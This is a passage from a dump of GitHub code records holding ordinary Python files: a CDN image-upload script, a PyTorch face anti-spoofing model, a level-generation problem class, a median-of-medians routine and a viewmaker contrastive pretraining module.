OcrClient()\n return str(oc.fapiao(file_tmp_path))\n","repo_name":"fisher335/fastapi-qrcode","sub_path":"router/MainController.py","file_name":"MainController.py","file_ext":"py","file_size_in_byte":4534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"74287590085","text":"import os\nimport sys\nimport requests\n\ndef duplicates(lst, item):\n return [i for i, x in enumerate(lst) if x == item]\n\ndef main():\n filename = sys.argv[1]\n print(filename)\n \n with open(filename) as f:\n mapping = {}\n lines = f.readlines()\n count = 0\n for l in lines:\n mapping[count] = l\n count += 1\n \n print(mapping.keys())\n for i, line in mapping.items():\n base_address = sys.argv[2]\n for j in duplicates(line.split(), '1'):\n with open('./resources/' + str(j) + '.png', 'rb') as resource:\n address = base_address + ':808' + str(i) + \"/resource/\" + str(j)\n print(address)\n \n response = requests.put(\n address, \n files={'content': resource.read(), 'Content-Type': 'image/png'}\n )\n \n print(response)\n\n\nif __name__ == '__main__':\n main()\n \n \n ","repo_name":"Delebrith/AUI-content-delivery-network","sub_path":"environment/insert_by_config.py","file_name":"insert_by_config.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"38929919333","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom .pub_mod import *\ntorch.set_printoptions(threshold=np.inf)\n\n\nclass Discriminator(nn.Module):\n def __init__(self, max_iter):\n super(Discriminator, self).__init__()\n self.ad_net = nn.Sequential(\n nn.Conv2d(256, 256, kernel_size=3, stride=2, padding=1, bias=False),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Conv2d(256, 512, kernel_size=3, stride=2, padding=1, bias=False),\n nn.BatchNorm2d(512),\n nn.LeakyReLU(0.2, inplace=True),\n nn.AvgPool2d(4, 4)\n )\n self.grl_layer = GRL(max_iter)\n self.fc = nn.Linear(512, 3)\n\n def forward(self, feature):\n adversarial_out = self.grl_layer(feature)\n adversarial_out = self.ad_net(adversarial_out).reshape(adversarial_out.shape[0], -1)\n adversarial_out = self.fc(adversarial_out)\n return 
adversarial_out\n\n\nclass SSAN_M(nn.Module):\n def __init__(self, ada_num=2, max_iter=4000):\n super(SSAN_M, self).__init__()\n self.conv1 = nn.Sequential(\n nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True), \n )\n \n self.Block1 = nn.Sequential(\n nn.Conv2d(64, 128, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(128),\n nn.ReLU(inplace=True), \n nn.Conv2d(128, 196, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(196),\n nn.ReLU(inplace=True), \n nn.Conv2d(196, 128, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(128),\n nn.ReLU(inplace=True), \n nn.MaxPool2d(kernel_size=3, stride=2, padding=1),\n )\n \n self.Block2 = nn.Sequential(\n nn.Conv2d(128, 128, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(128),\n nn.ReLU(inplace=True), \n nn.Conv2d(128, 196, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(196),\n nn.ReLU(inplace=True), \n nn.Conv2d(196, 128, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(128),\n nn.ReLU(inplace=True), \n nn.MaxPool2d(kernel_size=3, stride=2, padding=1),\n )\n \n self.Block3 = nn.Sequential(\n nn.Conv2d(128, 128, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(128),\n nn.ReLU(inplace=True),\n nn.Conv2d(128, 196, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(196),\n nn.ReLU(inplace=True),\n nn.Conv2d(196, 128, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(128),\n nn.ReLU(inplace=True), \n nn.MaxPool2d(kernel_size=3, stride=2, padding=1),\n )\n\n self.layer4 = nn.Sequential(\n nn.Conv2d(128, 256, kernel_size=3, stride=2, padding=1, bias=False),\n nn.BatchNorm2d(256),\n nn.ReLU(inplace=True)\n )\n\n self.adaIN_layers = nn.ModuleList([ResnetAdaINBlock(256) for i in range(ada_num)])\n\n self.conv_final = nn.Sequential(\n nn.Conv2d(256, 512, kernel_size=3, stride=2, padding=1, bias=False),\n nn.BatchNorm2d(512)\n )\n\n self.gamma = nn.Linear(256, 256, bias=False)\n self.beta = nn.Linear(256, 256, bias=False)\n \n self.FC = nn.Sequential(\n nn.Linear(256, 256, bias=False),\n nn.ReLU(inplace=True)\n )\n \n self.ada_conv1 = nn.Sequential(\n nn.Conv2d(128, 128, kernel_size=3, stride=2, padding=1, bias=False),\n nn.InstanceNorm2d(128),\n nn.ReLU(inplace=True)\n )\n \n self.ada_conv2 = nn.Sequential(\n nn.Conv2d(128, 128, kernel_size=3, stride=2, padding=1, bias=False),\n nn.InstanceNorm2d(128),\n nn.ReLU(inplace=True)\n )\n\n self.ada_conv3 = nn.Sequential(\n nn.Conv2d(128, 256, kernel_size=3, stride=2, padding=1, bias=False),\n nn.InstanceNorm2d(256)\n )\n self.dis = Discriminator(max_iter)\n\n self.decoder = nn.Sequential(\n nn.Upsample(scale_factor=2, mode='bilinear'),\n nn.Conv2d(512, 128, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(128),\n nn.ReLU(inplace=True),\n\n nn.Upsample(scale_factor=2, mode='bilinear'),\n nn.Conv2d(128, 64, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n\n nn.Conv2d(64, 1, kernel_size=3, stride=1, padding=1, bias=False),\n nn.ReLU(inplace=True)\n )\n\n def cal_gamma_beta(self, x1):\n x1 = self.conv1(x1)\n x1_1 = self.Block1(x1)\n x1_2 = self.Block2(x1_1)\n x1_3 = self.Block3(x1_2)\n\n x1_4 = self.layer4(x1_3)\n\n x1_add = x1_1\n x1_add = self.ada_conv1(x1_add)+x1_2\n x1_add = self.ada_conv2(x1_add)+x1_3\n x1_add = self.ada_conv3(x1_add)\n\n gmp = torch.nn.functional.adaptive_max_pool2d(x1_add, 1)\n gmp_ = self.FC(gmp.view(gmp.shape[0], -1))\n 
gamma, beta = self.gamma(gmp_), self.beta(gmp_)\n\n domain_invariant = x1_4\n return x1_4, gamma, beta, domain_invariant\n\n def forward(self, input1, input2):\n x1, gamma1, beta1, domain_invariant = self.cal_gamma_beta(input1)\n x2, gamma2, beta2, _ = self.cal_gamma_beta(input2)\n\n fea_x1_x1 = x1\n for i in range(len(self.adaIN_layers)):\n fea_x1_x1 = self.adaIN_layers[i](fea_x1_x1, gamma1, beta1)\n fea_x1_x1 = self.conv_final(fea_x1_x1)\n cls_x1_x1 = self.decoder(fea_x1_x1)\n \n fea_x1_x1 = torch.nn.functional.adaptive_avg_pool2d(fea_x1_x1, 1)\n fea_x1_x1 = fea_x1_x1.reshape(fea_x1_x1.shape[0], -1)\n\n fea_x1_x2 = x1\n for i in range(len(self.adaIN_layers)):\n fea_x1_x2 = self.adaIN_layers[i](fea_x1_x2, gamma2, beta2)\n fea_x1_x2 = self.conv_final(fea_x1_x2)\n fea_x1_x2 = torch.nn.functional.adaptive_avg_pool2d(fea_x1_x2, 1)\n fea_x1_x2 = fea_x1_x2.reshape(fea_x1_x2.shape[0], -1)\n\n dis_invariant = self.dis(domain_invariant).reshape(domain_invariant.shape[0], -1)\n return cls_x1_x1[:, 0, :, :], fea_x1_x1, fea_x1_x2, dis_invariant\n","repo_name":"wangzhuo2019/SSAN","sub_path":"networks/SSAN_M.py","file_name":"SSAN_M.py","file_ext":"py","file_size_in_byte":6539,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"99"} +{"seq_id":"33888899685","text":"from abc import ABC\nfrom pathlib import Path\nfrom pdb import set_trace as TT\n\nimport gymnasium as gym\nfrom gymnasium.utils import seeding\nimport numpy as np\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\n\nfrom control_pcgrl.configs.config import Config\n\nGVGAI_SPRITES = False\nPROB_DIR = str(Path(__file__).parent) # for convenience when loading sprite .pngs\n\n\"\"\"\nThe base class for all the problems that can be handled by the interface\n\nmap in prob are list of strings\n\"\"\"\nclass Problem(ABC):\n _tile_types = []\n eval_maps = []\n \"\"\"\n Constructor for the problem that initialize all the basic parameters. Abstract Base Class (ABS) that cannot be\n directly instantiated.\n \"\"\"\n def __init__(self, cfg: Config):\n self._map_shape = tuple(cfg.task.map_shape) # convert from omegaconf.listconfig.ListConfig to tuple\n self._height, self._width = self._map_shape[0], self._map_shape[1] # Will be overwritten if this is a 3D problem.\n tiles = self.get_tile_types()\n\n # How much to weight each component of the reward function (which is a linear sum).\n self._reward_weights = cfg.task.weights\n self._ctrl_reward_weights = cfg.task.weights # Can make this a separate config attribute later if necessary.\n\n # FIXME: assumption, will overrule a similar declaration by the child.\n self._empty_tile = tiles[0]\n\n self._wall_tile = tiles[1]\n\n self._prob = {}\n for tile in range(len(tiles)):\n self._prob.update({tile: 1.0 / len(tiles)})\n\n self._border_size = (1, 1)\n self._border_tile = tiles[0]\n if GVGAI_SPRITES:\n self._tile_size = 24\n self.GVGAI_SPRITES = True\n else:\n self._tile_size = 16\n self.GVGAI_SPRITES = False\n self._graphics = None\n self.render_path = cfg.render_mode is not None\n self.path_to_erase = set({}) # FIXME: only 3D really needs this.\n\n def init_tile_int_dict(self):\n \"\"\"Initialize a dictionary that maps tile names to integers.\"\"\"\n self._tile_int_dict = {tile: i for i, tile in enumerate(self.get_tile_types())}\n\n def get_tile_int(self, tile):\n return self._tile_int_dict[tile]\n\n\n def is_continuous(self):\n return False\n\n \"\"\"\n Seeding the used random variable to get the same result. 
If the seed is None,\n it will seed it with random start.\n\n Parameters:\n seed (int): the starting seed, if it is None a random seed number is used.\n \n Returns:\n int: the used seed (same as input if not None)\n \"\"\"\n def seed(self, seed=None):\n self._random, seed = seeding.np_random(seed)\n return seed\n\n \"\"\"\n Resets the problem to the initial state and save the start_stats from the starting map.\n Also, it can be used to change values between different environment resets\n\n Parameters:\n start_stats (dict(string,any)): the first stats of the map\n \"\"\"\n def reset(self, start_stats):\n self._start_stats = start_stats\n\n \"\"\"\n Get a list of all the different tile names\n\n Returns:\n string[]: that contains all the tile names\n \"\"\"\n def get_tile_types(self):\n return self._tile_types\n # raise NotImplementedError('get_tile_types is not implemented')\n\n \"\"\"\n Adjust the parameters for the current problem\n\n Parameters:\n width (int): change the width of the problem level\n height (int): change the height of the problem level\n probs (dict(string, float)): change the probability of each tile\n intiialization, the names are the same as the tile types from get_tile_types\n \"\"\"\n def adjust_param(self, cfg: Config):\n self._map_shape = tuple(cfg.task.map_shape) # convert from omegaconf.listconfig.ListConfig to tuple\n self._height, self._width = self._map_shape[0], self._map_shape[1] # Will be overwritten if this is a 3D problem.\n # prob = kwargs.get('probs')\n # if prob is not None:\n # for t in prob:\n # if t in self._prob:\n # self._prob[t] = prob[t]\n if self.render_path:\n # Make room for displaying path length\n self._border_size = (1, 2)\n else:\n self._border_size = (1, 1)\n\n \"\"\"\n Get the current stats of the map\n\n Returns:\n dict(string,any): stats of the current map to be used in the reward, episode_over, debug_info calculations\n \"\"\"\n def get_stats(self, map, **kwargs):\n raise NotImplementedError('get_graphics is not implemented')\n\n \"\"\"\n Get the current game reward between two stats\n\n Parameters:\n new_stats (dict(string,any)): the new stats after taking an action\n old_stats (dict(string,any)): the old stats before taking an action\n\n Returns:\n float: the current reward due to the change between the old map stats and the new map stats\n \"\"\"\n # def get_reward(self, new_stats, old_stats):\n # raise NotImplementedError('get_reward is not implemented')\n\n \"\"\"\n Uses the stats to check if the problem ended (episode_over) which means reached\n a satisfying quality based on the stats\n\n Parameters:\n new_stats (dict(string,any)): the new stats after taking an action\n old_stats (dict(string,any)): the old stats before taking an action\n\n Returns:\n boolean: True if the level reached satisfying quality based on the stats and False otherwise\n \"\"\"\n # def get_episode_over(self, new_stats, old_stats):\n # raise NotImplementedError('get_graphics is not implemented')\n\n \"\"\"\n Get any debug information need to be printed.\n\n Parameters:\n new_stats (dict(string,any)): the new stats after taking an action\n old_stats (dict(string,any)): the old stats before taking an action\n\n Returns:\n dict(any,any): is a debug information that can be used to debug what is\n happening in the problem\n \"\"\"\n def get_debug_info(self, new_stats, old_stats):\n raise NotImplementedError('get_debug_info is not implemented')\n\n def process_observation(self, observation):\n return observation\n\n def get_observable_tile_types(self):\n return 
self.get_tile_types()\n\n def init_grayscale_graphics(self):\n render_path = True\n tiles = self.get_tile_types()\n self._graphics = {}\n for i in range(len(tiles)):\n color = i * 255 // len(tiles), i * 255 // len(tiles), i * 255 // len(tiles), 255\n self._graphics[tiles[i]] = Image.new(\"RGBA\", (self._tile_size, self._tile_size), color)\n if render_path:\n self._graphics[\"path\"] = Image.new(\"RGBA\", (self._tile_size, self._tile_size), color)\n\n \"\"\"\n Get an image on how the map will look like for a specific map\n\n Parameters:\n map (string[][]): the current game map\n\n Returns:\n Image: a pillow image on how the map will look like using the problem\n graphics or default grey scale colors\n \"\"\"\n def render(self, map, render_path=None):\n if self._graphics == None:\n self.init_grayscale_graphics()\n\n full_width = len(map[0])+2*self._border_size[0]\n full_height = len(map)+2*self._border_size[1]\n lvl_image = Image.new(\"RGBA\", (full_width*self._tile_size, full_height*self._tile_size), (0,0,0,255))\n\n # Background floor everywhere\n for y in range(full_height):\n for x in range(full_width):\n lvl_image.paste(self._graphics['empty'], (x*self._tile_size, y*self._tile_size, (x+1)*self._tile_size, (y+1)*self._tile_size))\n\n # Borders\n for y in range(full_height):\n for x in range(self._border_size[0]):\n lvl_image.paste(self._graphics[self._border_tile], (x*self._tile_size, y*self._tile_size, (x+1)*self._tile_size, (y+1)*self._tile_size))\n lvl_image.paste(self._graphics[self._border_tile], ((full_width-x-1)*self._tile_size, y*self._tile_size, (full_width-x)*self._tile_size, (y+1)*self._tile_size))\n for x in range(full_width):\n for y in range(self._border_size[1]):\n lvl_image.paste(self._graphics[self._border_tile], (x*self._tile_size, y*self._tile_size, (x+1)*self._tile_size, (y+1)*self._tile_size))\n lvl_image.paste(self._graphics[self._border_tile], (x*self._tile_size, (full_height-y-1)*self._tile_size, (x+1)*self._tile_size, (full_height-y)*self._tile_size))\n\n # Map tiles\n for y in range(len(map)):\n for x in range(len(map[y])):\n tile_image = self._graphics[map[y][x]]\n lvl_image.paste(self._graphics[map[y][x]], ((x+self._border_size[0])*self._tile_size, (y+self._border_size[1])*self._tile_size, (x+self._border_size[0]+1)*self._tile_size, (y+self._border_size[1]+1)*self._tile_size), mask=tile_image)\n\n # Path, if applicable\n if render_path is not None and self.render_path:\n tile_graphics = self._graphics[\"path\"]\n for (y, x) in render_path:\n lvl_image.paste(tile_graphics, ((x + self._border_size[0]) * self._tile_size, (y + self._border_size[1]) * self._tile_size, (x + self._border_size[0] + 1) * self._tile_size, (y + self._border_size[1] + 1) * self._tile_size), mask=tile_graphics)\n draw = ImageDraw.Draw(lvl_image)\n # font = ImageFont.truetype(, )\n font_size = 32\n try:\n font = ImageFont.truetype(\"arial.ttf\", font_size)\n except OSError:\n try:\n font = ImageFont.truetype(\"LiberationMono-Regular.ttf\", font_size)\n except OSError:\n font = ImageFont.truetype(\"SFNSMono.ttf\", 32)\n # draw.text((x, y),\"Sample Text\",(r,g,b))\n draw.text(((full_width - 1) * self._tile_size / 2, 0),\"{}\".format(self.path_length),(255,255,255),font=font)\n return lvl_image\n\n def get_episode_over(self, new_stats, old_stats):\n \"\"\" If the generator has reached its targets. 
(change percentage and max iterations handled in pcgrl_env)\"\"\"\n\n return False\n\n def get_reward(self, new_stats, old_stats):\n return None\n\n\nclass Problem3D(Problem):\n def __init__(self, cfg: Config):\n super().__init__(cfg)\n self._height, self._width, self._length = cfg.task.map_shape","repo_name":"smearle/control-pcgrl","sub_path":"control_pcgrl/envs/probs/problem.py","file_name":"problem.py","file_ext":"py","file_size_in_byte":10414,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"99"} +{"seq_id":"22690252212","text":"# wyszukiwanie i-tego co do kolejnosci elementu (w szczegolnosci mediany) O(n)\n\ndef med_of_med(arr,i):\n\n # lista list 5 elementowych, zawierajaca kolejne elementy wejsciowej tablicy\n lists=[arr[j:j+5] for j in range(0,len(arr),5)] \n \n # tworze liste zawierajaca mediane kazdej z 5-el. list\n medians=[sorted(List)[len(List)//2] for List in lists] \n\n #szukam pivota mediany median w zaleznosci jak dluga jest lista 'medians'\n \n if len(medians) <= 5 :\n pivot=sorted(medians)[len(medians)//2]\n else:\n # rekurencyjnie szukam mediany listy 'medians'\n pivot=med_of_med(medians,len(medians)//2) \n \n\n #podzial na mniejsze i wieksze elementy od pivota\n low=[i for i in arr if ipivot]\n\n x=len(low)\n\n #element x-ty (o indeksie x-1) to pivot, na lewo sa mniejsze, na prawo wieksze, wiec spr po ktore stronie lezy szukany i-ty element\n if ix:\n return med_of_med(high, i-x-1) # na prawo mamy x-k elementow\n else: \n return pivot\n","repo_name":"sy1wi4/ASD-2020","sub_path":"searching/median_of_medians.py","file_name":"median_of_medians.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"pl","doc_type":"code","stars":5,"dataset":"github-code","pt":"99"} +{"seq_id":"30769556853","text":"import os\nimport random\nimport dotmap\nimport numpy as np\nfrom dotmap import DotMap\nfrom collections import OrderedDict\nfrom sklearn.metrics import f1_score\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nimport torchvision\n\nfrom src.datasets import datasets\nfrom src.models import resnet_small, resnet\nfrom src.models.transfer import LogisticRegression\nfrom src.objectives.memory_bank import MemoryBank\nfrom src.objectives.adversarial import AdversarialSimCLRLoss, AdversarialNCELoss\nfrom src.objectives.infonce import NoiseConstrastiveEstimation\nfrom src.objectives.simclr import SimCLRObjective\nfrom src.utils import utils\n\nfrom src.models import viewmaker\n\nimport torch_dct as dct\nimport pytorch_lightning as pl\nimport wandb\n\n\ndef create_dataloader(dataset, config, batch_size, shuffle=True, drop_last=True):\n loader = DataLoader(\n dataset, \n batch_size=batch_size,\n shuffle=shuffle, \n pin_memory=True,\n drop_last=drop_last,\n num_workers=config.data_loader_workers,\n )\n return loader\n\n\nclass PretrainViewMakerSystem(pl.LightningModule):\n '''Pytorch Lightning System for self-supervised pretraining \n with adversarially generated views.\n '''\n\n def __init__(self, config):\n super().__init__()\n self.config = config\n self.batch_size = config.optim_params.batch_size\n self.loss_name = self.config.loss_params.objective\n self.t = self.config.loss_params.t\n\n self.train_dataset, self.val_dataset = datasets.get_image_datasets(\n config.data_params.dataset,\n config.data_params.default_augmentations or 'none',\n )\n # Used for computing knn validation accuracy\n train_labels = self.train_dataset.dataset.targets\n 
self.train_ordered_labels = np.array(train_labels)\n\n self.model = self.create_encoder()\n self.viewmaker = self.create_viewmaker()\n \n # Used for computing knn validation accuracy.\n self.memory_bank = MemoryBank(\n len(self.train_dataset),\n self.config.model_params.out_dim,\n )\n\n def view(self, imgs):\n if 'Expert' in self.config.system:\n raise RuntimeError('Cannot call self.view() with Expert system')\n views = self.viewmaker(imgs)\n views = self.normalize(views)\n return views\n\n def create_encoder(self):\n '''Create the encoder model.'''\n if self.config.model_params.resnet_small:\n # ResNet variant for smaller inputs (e.g. CIFAR-10).\n encoder_model = resnet_small.ResNet18(self.config.model_params.out_dim)\n else:\n resnet_class = getattr(\n torchvision.models, \n self.config.model_params.resnet_version,\n )\n encoder_model = resnet_class(\n pretrained=False,\n num_classes=self.config.model_params.out_dim,\n )\n if self.config.model_params.projection_head:\n mlp_dim = encoder_model.fc.weight.size(1)\n encoder_model.fc = nn.Sequential(\n nn.Linear(mlp_dim, mlp_dim),\n nn.ReLU(),\n encoder_model.fc,\n )\n return encoder_model\n\n def create_viewmaker(self):\n view_model = viewmaker.Viewmaker(\n num_channels=self.train_dataset.NUM_CHANNELS,\n distortion_budget=self.config.model_params.view_bound_magnitude,\n activation=self.config.model_params.generator_activation or 'relu',\n clamp=self.config.model_params.clamp_views,\n frequency_domain=self.config.model_params.spectral or False,\n downsample_to=self.config.model_params.viewmaker_downsample or False,\n num_res_blocks=self.config.model_params.num_res_blocks or 5,\n )\n return view_model\n\n def noise(self, batch_size, device):\n shape = (batch_size, self.config.model_params.noise_dim)\n # Center noise at 0 then project to unit sphere.\n noise = utils.l2_normalize(torch.rand(shape, device=device) - 0.5)\n return noise\n \n def get_repr(self, img):\n '''Get the representation for a given image.'''\n if 'Expert' not in self.config.system:\n # The Expert system datasets are normalized already.\n img = self.normalize(img)\n return self.model(img)\n \n def normalize(self, imgs):\n # These numbers were computed using compute_image_dset_stats.py\n if 'cifar' in self.config.data_params.dataset:\n mean = torch.tensor([0.491, 0.482, 0.446], device=imgs.device)\n std = torch.tensor([0.247, 0.243, 0.261], device=imgs.device)\n else:\n raise ValueError(f'Dataset normalizer for {self.config.data_params.dataset} not implemented')\n imgs = (imgs - mean[None, :, None, None]) / std[None, :, None, None]\n return imgs\n\n def forward(self, batch, train=True):\n indices, img, img2, neg_img, _, = batch\n if self.loss_name == 'AdversarialNCELoss':\n view1 = self.view(img)\n view1_embs = self.model(view1)\n emb_dict = {\n 'indices': indices,\n 'view1_embs': view1_embs,\n }\n elif self.loss_name == 'AdversarialSimCLRLoss':\n if self.config.model_params.double_viewmaker:\n view1, view2 = self.view(img)\n else:\n view1 = self.view(img)\n view2 = self.view(img2)\n emb_dict = {\n 'indices': indices,\n 'view1_embs': self.model(view1),\n 'view2_embs': self.model(view2),\n }\n else:\n raise ValueError(f'Unimplemented loss_name {self.loss_name}.')\n \n if self.global_step % 200 == 0:\n # Log some example views. 
\n views_to_log = view1.permute(0,2,3,1).detach().cpu().numpy()[:10]\n wandb.log({\"examples\": [wandb.Image(view, caption=f\"Epoch: {self.current_epoch}, Step {self.global_step}, Train {train}\") for view in views_to_log]})\n\n return emb_dict\n\n def get_losses_for_batch(self, emb_dict, train=True):\n if self.loss_name == 'AdversarialSimCLRLoss':\n view_maker_loss_weight = self.config.loss_params.view_maker_loss_weight\n loss_function = AdversarialSimCLRLoss(\n embs1=emb_dict['view1_embs'],\n embs2=emb_dict['view2_embs'],\n t=self.t,\n view_maker_loss_weight=view_maker_loss_weight\n )\n encoder_loss, view_maker_loss = loss_function.get_loss()\n img_embs = emb_dict['view1_embs'] \n elif self.loss_name == 'AdversarialNCELoss':\n view_maker_loss_weight = self.config.loss_params.view_maker_loss_weight\n loss_function = AdversarialNCELoss(\n emb_dict['indices'],\n emb_dict['view1_embs'],\n self.memory_bank,\n k=self.config.loss_params.k,\n t=self.t,\n m=self.config.loss_params.m,\n view_maker_loss_weight=view_maker_loss_weight\n )\n encoder_loss, view_maker_loss = loss_function.get_loss()\n img_embs = emb_dict['view1_embs'] \n else:\n raise Exception(f'Objective {self.loss_name} is not supported.') \n \n # Update memory bank.\n if train:\n with torch.no_grad():\n if self.loss_name == 'AdversarialNCELoss':\n new_data_memory = loss_function.updated_new_data_memory()\n self.memory_bank.update(emb_dict['indices'], new_data_memory)\n else:\n new_data_memory = utils.l2_normalize(img_embs, dim=1)\n self.memory_bank.update(emb_dict['indices'], new_data_memory)\n\n return encoder_loss, view_maker_loss\n\n def get_nearest_neighbor_label(self, img_embs, labels):\n '''\n Used for online kNN classifier.\n For each image in validation, find the nearest image in the \n training dataset using the memory bank. 
Assume its label as\n the predicted label.\n '''\n batch_size = img_embs.size(0)\n all_dps = self.memory_bank.get_all_dot_products(img_embs)\n _, neighbor_idxs = torch.topk(all_dps, k=1, sorted=False, dim=1)\n neighbor_idxs = neighbor_idxs.squeeze(1)\n neighbor_idxs = neighbor_idxs.cpu().numpy()\n\n neighbor_labels = self.train_ordered_labels[neighbor_idxs]\n neighbor_labels = torch.from_numpy(neighbor_labels).long()\n\n num_correct = torch.sum(neighbor_labels.cpu() == labels.cpu()).item()\n return num_correct, batch_size\n\n def training_step(self, batch, batch_idx, optimizer_idx):\n emb_dict = self.forward(batch)\n emb_dict['optimizer_idx'] = torch.tensor(optimizer_idx, device=self.device)\n return emb_dict\n \n def training_step_end(self, emb_dict):\n encoder_loss, view_maker_loss = self.get_losses_for_batch(emb_dict, train=True)\n\n # Handle Tensor (dp) and int (ddp) cases\n if emb_dict['optimizer_idx'].__class__ == int or emb_dict['optimizer_idx'].dim() == 0:\n optimizer_idx = emb_dict['optimizer_idx'] \n else:\n optimizer_idx = emb_dict['optimizer_idx'][0]\n if optimizer_idx == 0:\n metrics = {\n 'encoder_loss': encoder_loss, 'temperature': self.t\n }\n return {'loss': encoder_loss, 'log': metrics}\n else:\n metrics = {\n 'view_maker_loss': view_maker_loss,\n }\n return {'loss': view_maker_loss, 'log': metrics}\n\n def validation_step(self, batch, batch_idx):\n emb_dict = self.forward(batch, train=False)\n if 'img_embs' in emb_dict:\n img_embs = emb_dict['img_embs']\n else:\n _, img, _, _, _ = batch\n img_embs = self.get_repr(img) # Need encoding of image without augmentations (only normalization).\n labels = batch[-1]\n encoder_loss, view_maker_loss = self.get_losses_for_batch(emb_dict, train=False)\n\n num_correct, batch_size = self.get_nearest_neighbor_label(img_embs, labels)\n output = OrderedDict({\n 'val_loss': encoder_loss + view_maker_loss,\n 'val_encoder_loss': encoder_loss,\n 'val_view_maker_loss': view_maker_loss,\n 'val_num_correct': torch.tensor(num_correct, dtype=float, device=self.device),\n 'val_num_total': torch.tensor(batch_size, dtype=float, device=self.device),\n })\n\n return output\n\n def validation_epoch_end(self, outputs):\n metrics = {}\n for key in outputs[0].keys():\n try:\n metrics[key] = torch.stack([elem[key] for elem in outputs]).mean()\n except:\n pass\n\n num_correct = torch.stack([out['val_num_correct'] for out in outputs]).sum()\n num_total = torch.stack([out['val_num_total'] for out in outputs]).sum()\n val_acc = num_correct / float(num_total)\n metrics['val_acc'] = val_acc\n progress_bar = {'acc': val_acc}\n return {'val_loss': metrics['val_loss'], \n 'log': metrics, \n 'val_acc': val_acc, \n 'progress_bar': progress_bar}\n\n def optimizer_step(self, current_epoch, batch_nb, optimizer, optimizer_idx, \n second_order_closure=None, on_tpu=False, using_native_amp=False, using_lbfgs=False):\n if not self.config.optim_params.viewmaker_freeze_epoch:\n super().optimizer_step(current_epoch, batch_nb, optimizer, optimizer_idx)\n return\n\n if optimizer_idx == 0:\n optimizer.step()\n optimizer.zero_grad()\n elif current_epoch < self.config.optim_params.viewmaker_freeze_epoch:\n # Optionally freeze the viewmaker at a certain pretraining epoch.\n optimizer.step()\n optimizer.zero_grad()\n\n def configure_optimizers(self):\n # Optimize temperature with encoder.\n if type(self.t) == float or type(self.t) == int:\n encoder_params = self.model.parameters()\n else:\n encoder_params = list(self.model.parameters()) + [self.t]\n\n encoder_optim = torch.optim.SGD(\n 
encoder_params,\n lr=self.config.optim_params.learning_rate,\n momentum=self.config.optim_params.momentum,\n weight_decay=self.config.optim_params.weight_decay,\n )\n view_optim_name = self.config.optim_params.viewmaker_optim\n view_parameters = self.viewmaker.parameters()\n if view_optim_name == 'adam':\n view_optim = torch.optim.Adam(\n view_parameters, lr=self.config.optim_params.viewmaker_learning_rate or 0.001)\n elif not view_optim_name or view_optim_name == 'sgd':\n view_optim = torch.optim.SGD(\n view_parameters,\n lr=self.config.optim_params.viewmaker_learning_rate or self.config.optim_params.learning_rate,\n momentum=self.config.optim_params.momentum,\n weight_decay=self.config.optim_params.weight_decay,\n )\n else:\n raise ValueError(f'Optimizer {view_optim_name} not implemented')\n \n return [encoder_optim, view_optim], []\n\n def train_dataloader(self):\n return create_dataloader(self.train_dataset, self.config, self.batch_size)\n\n def val_dataloader(self):\n return create_dataloader(self.val_dataset, self.config, self.batch_size, \n shuffle=False, drop_last=False)\n\n\nclass PretrainExpertSystem(PretrainViewMakerSystem):\n '''Pytorch Lightning System for self-supervised pretraining \n with expert image views as described in Instance Discrimination \n or SimCLR.\n '''\n\n def __init__(self, config):\n super(PretrainViewMakerSystem, self).__init__()\n self.config = config\n self.batch_size = config.optim_params.batch_size\n self.loss_name = self.config.loss_params.name\n self.t = self.config.loss_params.t\n\n default_augmentations = self.config.data_params.default_augmentations\n # DotMap is the default argument when a config argument is missing\n if default_augmentations == DotMap():\n default_augmentations = 'all'\n self.train_dataset, self.val_dataset = datasets.get_image_datasets(\n config.data_params.dataset,\n default_augmentations=default_augmentations,\n )\n train_labels = self.train_dataset.dataset.targets\n self.train_ordered_labels = np.array(train_labels)\n self.model = self.create_encoder()\n self.memory_bank = MemoryBank(\n len(self.train_dataset), \n self.config.model_params.out_dim, \n )\n\n def forward(self, img):\n return self.model(img)\n\n def get_losses_for_batch(self, emb_dict, train=True):\n if self.loss_name == 'nce':\n loss_fn = NoiseConstrastiveEstimation(emb_dict['indices'], emb_dict['img_embs_1'], self.memory_bank,\n k=self.config.loss_params.k,\n t=self.t,\n m=self.config.loss_params.m)\n loss = loss_fn.get_loss()\n elif self.loss_name == 'simclr':\n if 'img_embs_2' not in emb_dict:\n raise ValueError(f'img_embs_2 is required for SimCLR loss')\n loss_fn = SimCLRObjective(emb_dict['img_embs_1'], emb_dict['img_embs_2'], t=self.t)\n loss = loss_fn.get_loss()\n else:\n raise Exception(f'Objective {self.loss_name} is not supported.')\n\n if train:\n with torch.no_grad():\n if self.loss_name == 'nce':\n new_data_memory = loss_fn.updated_new_data_memory()\n self.memory_bank.update(emb_dict['indices'], new_data_memory)\n elif 'simclr' in self.loss_name:\n outputs_avg = (utils.l2_normalize(emb_dict['img_embs_1'], dim=1) + \n utils.l2_normalize(emb_dict['img_embs_2'], 